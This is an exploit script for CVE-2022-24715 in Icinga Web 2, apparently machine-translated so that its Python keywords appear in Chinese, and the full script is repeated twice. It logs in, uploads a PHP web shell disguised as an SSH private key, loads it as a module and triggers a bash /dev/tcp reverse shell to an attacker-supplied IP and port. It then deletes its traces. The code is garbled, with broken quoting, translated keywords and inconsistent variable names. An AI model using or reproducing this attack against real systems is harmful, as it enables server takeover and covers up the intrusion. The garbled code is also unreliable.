#!/usr/bin/env Python3
#利用title: icinga web 2.10-验证远程代码执行
#日期: 8/07/2023
#利用作者: Dante Corona(又名CXDXNT)
#软件link: https://github.com/icinga/icingaweb2
#供应商homepage: https://icinga.com/
#软件link: https://github.com/icinga/icingaweb2
#版本: 2.8.6,2.9.6,2.10
#在Linux上测试了: ICinga Web 2版本2.9.2
#CVE: CVE-2022-24715
#基于: https://nvd.nist.gov/vuln/detail/cve-2022-24715
导入请求,argparse,re,随机,字符串
从Colorama进口,风格
DEF LETTER_RANDOM():
letras=string.ascii_lowercase
targin_random=random.choices(letras,k=6)
返回''。
def Users_url_password():
parser=argparse.argumentparser(description='描述'descriptióndetu程序。')
parser.add_argument(' - u',' - url',type=str,必需=true,help='insertar la url 3http://IP_VICTIMA')
parser.add_argument(' - u',' - user',type=str,必需=true,help='insertar usuario -u user')
parser.add_argument(' - p',' - password',type=str,必需=true,help,help='insertarcontastña-p密码')
parser.add_argument(' - i',' - '-ip',type=str,必需=true,help='insertar ip de atacante -i ip')
parser.add_argument(' - p',' - port',type=str,必需=true,help='insertar puerto de atacante -p port')
args=parser.parse_args()
url=args.url
用户=args.user
password=args.password
ip_attack=args.ip
port_attack=args.port
返回URL,用户,密码,IP_ATTACK,PORT_ATTACK
DEF登录(URL,用户,密码):
TRY:
login_url=url +'/icingaweb2/authentication/login'
session=requests.session()
r=session.get(login_url)
csrf_regex=re.findall(r'name='csrftoken'value='([^']*)',r.text)[0]
data_post={'username':user,
'password'
assword,
'csrftoken':csrf_regex,
'formuid':'form_login',
'btn_submit':'login'
}
响应=session.post(login_url,data=data_post)
如果“欢迎来到Icinga网络!”响应.text:
打印(f'{fore.green} [*] {style.Reset_all}会话成功。')
r=session.get(login_url)
其他:
打印('[!]无法登录。')
出口(1)
#Return会话,CSRF_REGEX
requests.exceptions.invalidurl:除外
print(f'{fore.yellow} [!] {style.Reset_all}错误URL :(')
出口(1)
返回会话,csrf_regex
def upload_file(session,url,targin_random,csrf_regex):
webshell=f'''----开始RSA私钥-------------
miibogibaajbakj34gkxfhd90vcnlylinfex6ppy1tpf9cnzj4p4wgekls1pt8qu
kuprkfflfryc9aikjbjtwit+cqvjwyzvqwecaweaqjaijaijaijaijlixby2qpfos4dsmoem
O3QGY0T6Z09AIJTH+5OERV1BE+N4CDYJKFFGZDA88VQENZIRM0GRQ6A+HPGQMD2K
tqihakmsvzibnni7ot/osie2tmjly4swtqaevxyse2rbfdydaiebcuearqnmnbp7
9MXDXDF6AU0CN/RPBJB9QSHDCWZHGZUCIG2ES59Z8Z8UGGRDY+PXLQNWFOTADXD+UY
v/ow5t0q5gijaieyys4rai9yg8ewx/2w0t67zuvaw8eomb6biug0xcu+3okcibos
/5oipgotdsy7bcf9igpse8zggkzgyqvzen97ye00
-----结束RSA私钥------
?php系统($ _请求['%s']);
''%carame_random
upload_url=url +'/icingaweb2/config/createresource'
r=session.get(upload_url)
csrf=re.findall(r'name='csrftoken'value='([^']*)',r.text)[0]
data_post={'type':'ssh',
'name':'shm/'+targin_random,
'user':f'./././././././././././././././././././dev/shm/{farem_random}/run.php',
'private_key':webshell,
'formuid':'form_config_resource',
'csrftoken':csrf,
'btn_submit':'Save更改'
}
upload_response=session.post(upload_url,data=data_post)
check=requests.get(url + f'/icingaweb2/lib/icinga/icinga-php-php-thirdparty/dev/shm/{farne_random}/run.php')
如果check.status_code!=200 :
print(f'{fore.yellow} [!] {style.Reset_all}错误上传文件。(')
出口(1)
其他:
print(f'{fore.green} [*] {style.reset_all}文件成功上传。')
def enable_module(session,url,targin_random):
url_module=url+'/icingaweb2/config/enstry'
r_module=session.get(url_module)
csrf_module=re.findall(r'name='csrftoken'value='([^']*)'',r_module.text)[0]
data_post={'global_show_stacktraces':'0',
'global_show_stacktraces':'1',
'global_show_application_state_messages':'0',
'global_show_application_state_messages':'1',
'global_module_path':'/dev/shm/',
'global_config_resource':'icingaweb2',
'logging_log':'none',
'themes_default':'icinga',
'themes_disabled':'0',
'authentication_default_domain':'',
'formuid':'form_config_general',
'csrftoken':f'{csrf_module}',
'btn_submit':'Save更改'
}
resul=session.post(url_module,data_post)
#----------------------------------------------------------------------------------
url_enable=url +'/icingaweb2/config/moduleenable'
r_enable=session.get(url_enable)
csrf_enable=re.findall(r'name='csrftoken'value='([^']*)'',r_enable.text)[0]
data_enable={'distindifier':f'{targe_random}','csrftoken':f'{csrf_enable}','btn_submit':'btn_submit
resul_enable=session.post(url_enable,data_enable)
def reverse_shell(session,url,ip_attack,port_attack,tarne_random):
reverse_url=url +'/icingaweb2/dashboard'
reverse_exe_one=reverse_url+f'?{farne_random}=echo+'bash%20-I%20%20%3E%26%20%20%2FDEV%2FTCP%2F {ip_attack}%2F {port_attack}%2f {port_attack}%200%200%3E%3E%261'+++/tmpp/tmpp/tm}}
reverse_exe_two=reverse_url + f'?{farne_random}=bash +/tmp/{farne_random}'
reverse_response_one=session.get(reverse_exe_one)
TRY:
reverse_response_two=session.get(reverse_exe_two,timeout=5)
Except:
print(f'{fore.red} [*] {style.reset_all}消除证据')
remove=session.get(reverse_url + f'?{farne_random}=rm +/tmp/{farne_random}')
disable_url=url +'/icingaweb2/config/moduledisable'
r_disable=session.get(disable_url)
csrf_disable=re.findall(r'name='csrftoken'value='([^']*)'',r_disable.text)[0]
data_disable={'distindifier':f'{targe_random}','csrftoken':csrf_disable,'btn_submit':'btn_submit'}
response_disable=session.post(disable_url,data=data_disable)
def disable_module(session,url,targin_random):
url_disable=url +'/icingaweb2/config/moduledisable'
如果name=='__ -Main __':
targin_random=letter_random()
URL,用户,密码,IP_ATTACK,PORT_ATTACK=USER_URL_PASSWORD()
会话,csrf_regex=登录(url,用户,密码)
upload_file(session,url,tarne_random,csrf_regex)
enable_module(session,url,tarne_random)
reverse_shell(session,url,ip_attack,port_attack,tarne_random)
#利用title: icinga web 2.10-验证远程代码执行
#日期: 8/07/2023
#利用作者: Dante Corona(又名CXDXNT)
#软件link: https://github.com/icinga/icingaweb2
#供应商homepage: https://icinga.com/
#软件link: https://github.com/icinga/icingaweb2
#版本: 2.8.6,2.9.6,2.10
#在Linux上测试了: ICinga Web 2版本2.9.2
#CVE: CVE-2022-24715
#基于: https://nvd.nist.gov/vuln/detail/cve-2022-24715
导入请求,argparse,re,随机,字符串
从Colorama进口,风格
DEF LETTER_RANDOM():
letras=string.ascii_lowercase
targin_random=random.choices(letras,k=6)
返回''。
def Users_url_password():
parser=argparse.argumentparser(description='描述'descriptióndetu程序。')
parser.add_argument(' - u',' - url',type=str,必需=true,help='insertar la url 3http://IP_VICTIMA')
parser.add_argument(' - u',' - user',type=str,必需=true,help='insertar usuario -u user')
parser.add_argument(' - p',' - password',type=str,必需=true,help,help='insertarcontastña-p密码')
parser.add_argument(' - i',' - '-ip',type=str,必需=true,help='insertar ip de atacante -i ip')
parser.add_argument(' - p',' - port',type=str,必需=true,help='insertar puerto de atacante -p port')
args=parser.parse_args()
url=args.url
用户=args.user
password=args.password
ip_attack=args.ip
port_attack=args.port
返回URL,用户,密码,IP_ATTACK,PORT_ATTACK
DEF登录(URL,用户,密码):
TRY:
login_url=url +'/icingaweb2/authentication/login'
session=requests.session()
r=session.get(login_url)
csrf_regex=re.findall(r'name='csrftoken'value='([^']*)',r.text)[0]
data_post={'username':user,
'password'
assword,'csrftoken':csrf_regex,
'formuid':'form_login',
'btn_submit':'login'
}
响应=session.post(login_url,data=data_post)
如果“欢迎来到Icinga网络!”响应.text:
打印(f'{fore.green} [*] {style.Reset_all}会话成功。')
r=session.get(login_url)
其他:
打印('[!]无法登录。')
出口(1)
#Return会话,CSRF_REGEX
requests.exceptions.invalidurl:除外
print(f'{fore.yellow} [!] {style.Reset_all}错误URL :(')
出口(1)
返回会话,csrf_regex
def upload_file(session,url,targin_random,csrf_regex):
webshell=f'''----开始RSA私钥-------------
miibogibaajbakj34gkxfhd90vcnlylinfex6ppy1tpf9cnzj4p4wgekls1pt8qu
kuprkfflfryc9aikjbjtwit+cqvjwyzvqwecaweaqjaijaijaijaijlixby2qpfos4dsmoem
O3QGY0T6Z09AIJTH+5OERV1BE+N4CDYJKFFGZDA88VQENZIRM0GRQ6A+HPGQMD2K
tqihakmsvzibnni7ot/osie2tmjly4swtqaevxyse2rbfdydaiebcuearqnmnbp7
9MXDXDF6AU0CN/RPBJB9QSHDCWZHGZUCIG2ES59Z8Z8UGGRDY+PXLQNWFOTADXD+UY
v/ow5t0q5gijaieyys4rai9yg8ewx/2w0t67zuvaw8eomb6biug0xcu+3okcibos
/5oipgotdsy7bcf9igpse8zggkzgyqvzen97ye00
-----结束RSA私钥------
?php系统($ _请求['%s']);
''%carame_random
upload_url=url +'/icingaweb2/config/createresource'
r=session.get(upload_url)
csrf=re.findall(r'name='csrftoken'value='([^']*)',r.text)[0]
data_post={'type':'ssh',
'name':'shm/'+targin_random,
'user':f'./././././././././././././././././././dev/shm/{farem_random}/run.php',
'private_key':webshell,
'formuid':'form_config_resource',
'csrftoken':csrf,
'btn_submit':'Save更改'
}
upload_response=session.post(upload_url,data=data_post)
check=requests.get(url + f'/icingaweb2/lib/icinga/icinga-php-php-thirdparty/dev/shm/{farne_random}/run.php')
如果check.status_code!=200 :
print(f'{fore.yellow} [!] {style.Reset_all}错误上传文件。(')
出口(1)
其他:
print(f'{fore.green} [*] {style.reset_all}文件成功上传。')
def enable_module(session,url,targin_random):
url_module=url+'/icingaweb2/config/enstry'
r_module=session.get(url_module)
csrf_module=re.findall(r'name='csrftoken'value='([^']*)'',r_module.text)[0]
data_post={'global_show_stacktraces':'0',
'global_show_stacktraces':'1',
'global_show_application_state_messages':'0',
'global_show_application_state_messages':'1',
'global_module_path':'/dev/shm/',
'global_config_resource':'icingaweb2',
'logging_log':'none',
'themes_default':'icinga',
'themes_disabled':'0',
'authentication_default_domain':'',
'formuid':'form_config_general',
'csrftoken':f'{csrf_module}',
'btn_submit':'Save更改'
}
resul=session.post(url_module,data_post)
#----------------------------------------------------------------------------------
url_enable=url +'/icingaweb2/config/moduleenable'
r_enable=session.get(url_enable)
csrf_enable=re.findall(r'name='csrftoken'value='([^']*)'',r_enable.text)[0]
data_enable={'distindifier':f'{targe_random}','csrftoken':f'{csrf_enable}','btn_submit':'btn_submit
resul_enable=session.post(url_enable,data_enable)
def reverse_shell(session,url,ip_attack,port_attack,tarne_random):
reverse_url=url +'/icingaweb2/dashboard'
reverse_exe_one=reverse_url+f'?{farne_random}=echo+'bash%20-I%20%20%3E%26%20%20%2FDEV%2FTCP%2F {ip_attack}%2F {port_attack}%2f {port_attack}%200%200%3E%3E%261'+++/tmpp/tmpp/tm}}
reverse_exe_two=reverse_url + f'?{farne_random}=bash +/tmp/{farne_random}'
reverse_response_one=session.get(reverse_exe_one)
TRY:
reverse_response_two=session.get(reverse_exe_two,timeout=5)
Except:
print(f'{fore.red} [*] {style.reset_all}消除证据')
remove=session.get(reverse_url + f'?{farne_random}=rm +/tmp/{farne_random}')
disable_url=url +'/icingaweb2/config/moduledisable'
r_disable=session.get(disable_url)
csrf_disable=re.findall(r'name='csrftoken'value='([^']*)'',r_disable.text)[0]
data_disable={'distindifier':f'{targe_random}','csrftoken':csrf_disable,'btn_submit':'btn_submit'}
response_disable=session.post(disable_url,data=data_disable)
def disable_module(session,url,targin_random):
url_disable=url +'/icingaweb2/config/moduledisable'
如果name=='__ -Main __':
targin_random=letter_random()
URL,用户,密码,IP_ATTACK,PORT_ATTACK=USER_URL_PASSWORD()
会话,csrf_regex=登录(url,用户,密码)
upload_file(session,url,tarne_random,csrf_regex)
enable_module(session,url,tarne_random)
reverse_shell(session,url,ip_attack,port_attack,tarne_random)
